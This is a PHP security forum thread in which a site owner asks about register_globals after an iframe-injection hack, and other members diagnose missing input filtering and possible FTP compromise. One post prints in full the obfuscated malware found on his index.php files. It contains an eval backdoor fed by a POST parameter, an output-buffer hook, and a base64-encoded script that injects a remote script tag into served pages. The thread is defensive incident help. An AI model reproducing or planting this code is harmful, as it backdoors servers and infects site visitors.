Turning Register Globals OFF

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
User avatar
kendall
Forum Regular
Posts: 852
Joined: Tue Jul 30, 2002 10:21 am
Location: Trinidad, West Indies
Contact:

Turning Register Globals OFF

Post by kendall »

hey

is using this statment
;register_globals = Off
turning the register global "off" or disabling it and the default is on?

i'm using PHP < 5
User avatar
Christopher
Site Administrator
Posts: 13596
Joined: Wed Aug 25, 2004 7:54 pm
Location: New York, NY, US

Re: Turning Register Globals OFF

Post by Christopher »

(#10850)
User avatar
kendall
Forum Regular
Posts: 852
Joined: Tue Jul 30, 2002 10:21 am
Location: Trinidad, West Indies
Contact:

Re: Turning Register Globals OFF

Post by kendall »

arborint wrote:That is commented out.

http://us.php.net/manual/en/ini.core.ph ... er-globals
what does it mean when it is commented out? does it mean that it is commented out and no one and turn it on or off? does it mean then that it defaults to on or off? or that register_globals doesn't exsist?
User avatar
Christopher
Site Administrator
Posts: 13596
Joined: Wed Aug 25, 2004 7:54 pm
Location: New York, NY, US

Re: Turning Register Globals OFF

Post by Christopher »

If it is commented out then that line does nothing, so it will be set to the default.
(#10850)
User avatar
kendall
Forum Regular
Posts: 852
Joined: Tue Jul 30, 2002 10:21 am
Location: Trinidad, West Indies
Contact:

Re: Turning Register Globals OFF

Post by kendall »

arborint wrote:If it is commented out then that line does nothing, so it will be set to the default.
which is usually "on" doesn't it.....because im using php < 5?

i got hacked with the <iframe src="topworld.cn...... hack

I dont see anything in the logs that suggest how they got in.... so im trying to clear my name
User avatar
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto
Contact:

Re: Turning Register Globals OFF

Post by John Cartwright »

kendall wrote:which is usually "on" doesn't it.....because im using php < 5?
http://ca2.php.net/manual/en/ini.core.php#ini.register-globals wrote: As of » PHP 4.2.0, this directive defaults to off.
ldougherty
Forum Contributor
Posts: 103
Joined: Sun May 03, 2009 11:39 am

Re: Turning Register Globals OFF

Post by ldougherty »

<iframe injections are commonly performed via compromised FTP information. What you need to do is take the modified date of the injected file and look into the raw logs on the server to determine what happened at that time. Generally if you look through the FTP log you'll see where the file(s) have been updated.
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: Turning Register Globals OFF

Post by kaisellgren »

If you do not implicitly specify it as on, it should be off unless there is a third-party affecting it (like .htaccess).

That ; character in the beginning of the line is a comment marker and it makes the line a comment so it is "commented out".

I believe your problem has nothing to do with Register Globals.
User avatar
kendall
Forum Regular
Posts: 852
Joined: Tue Jul 30, 2002 10:21 am
Location: Trinidad, West Indies
Contact:

Re: Turning Register Globals OFF

Post by kendall »

got that from my server logs....can any explain what he is trying to do here?
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: Turning Register Globals OFF

Post by kaisellgren »

kendall wrote:got that from my server logs....can any explain what he is trying to do here?
Your index.php in news page may be vulnerable to attacks due to lack of proper input filtering.
User avatar
kendall
Forum Regular
Posts: 852
Joined: Tue Jul 30, 2002 10:21 am
Location: Trinidad, West Indies
Contact:

Re: Turning Register Globals OFF

Post by kendall »

Code: Select all

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_
lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGF
JOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCB
sYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe
3ZhciBiQzREPSdfNzZhcl8yMGFfM2RfMjJTY3JpcHRfNDVuZ2lu
ZV8yMl8yY2JfM2RfMjJfNTZlcnNpb25fMjhfMjkrXzIyXzJjal8zZF8
yMl8yMl8yY3VfM2RfNmVhdmlfNjdhXzc0b183Ml8yZXVzZV83Mk
FnZW50XzNiaWZfMjgoXzc1XzJlaW5kXzY1eE9mXzI4XzIyV2luX
zIyKV8zZTApXzI2XzI2KHVfMmVpbmRleE9mXzI4XzIyXzRlVF8y
MF8zNl8yMilfM2NfMzBfMjlfMjZfMjYoZG9jdW1lbnRfMmVjb29fNm
JfNjlfNjVfMmVpbmRlXzc4T2ZfMjhfMjJtaWVrXzNkMV8yMilfM2Mw
KV8yNl8yNih0eV83MGVvZl8yOF83YV83MnZ6Xzc0cylfMjFfM2R
0eXBlb2YoXzIyQV8yMilfMjkpXzdiXzdhcnZ6Xzc0c18zZF8yMkFf
MjJfM2Jldl82MWxfMjhfMjJfNjlmKHdfNjluZF82ZndfMmVfMjJfMmJ
hXzJiXzIyKWpfM2RqXzJiXzIyK182MStfMjJfNGRhal82ZnJfMjJfM
mJiK2ErXzIyXzRkaW5vXzcyXzIyXzJiYitfNjErXzIyXzQyXzc1aV8
2Y2RfMjIrYl8yYl8yMmpfM2JfMjJfMjlfM2JkXzZmY3VfNmRlbnRfM
mV3XzcyXzY5dGUoXzIyXzNjc2NyaXB0XzIwc3JfNjNfM2RfMmZf
MmZndW1ibGFyXzJlY25fMmZyc3NfMmZfM2ZfNjlfNjRfM2RfMjIra
itfMjJfM2VfM2NfNWNfMmZzY3JpcHRfM2VfMjIpXzNiXzdkJzt2YX
IgRnVKeD1iQzRELnJlcGxhY2UoL18vZywnJScpO3ZhciB4RnRJS
j11bmVzY2FwZShGdUp4KTtldmFsKHhGdElKKX0pKCk7CiAtLT48
L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This is what is being left on my index.php pages....both in php and javascript....i am finding a image.php in my images files.
Last edited by Benjamin on Sun May 17, 2009 2:21 am, edited 2 times in total.
Reason: Changed code type from text to php, Added line feeds to avoid horizontal scrolling.
User avatar
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto
Contact:

Re: Turning Register Globals OFF

Post by John Cartwright »

As described before, you are not filtering your input variables correctly, and in not doing so, have allowed the execution of remote code on your server (which in turn manipulated your files). The first step would be to immediatly take your site offline until this has been patched, otherwise there is no way to tell how far you've been comprimised. The second step would be to assure you are only included files within your filesystem, and preferably whitelisted.
Post Reply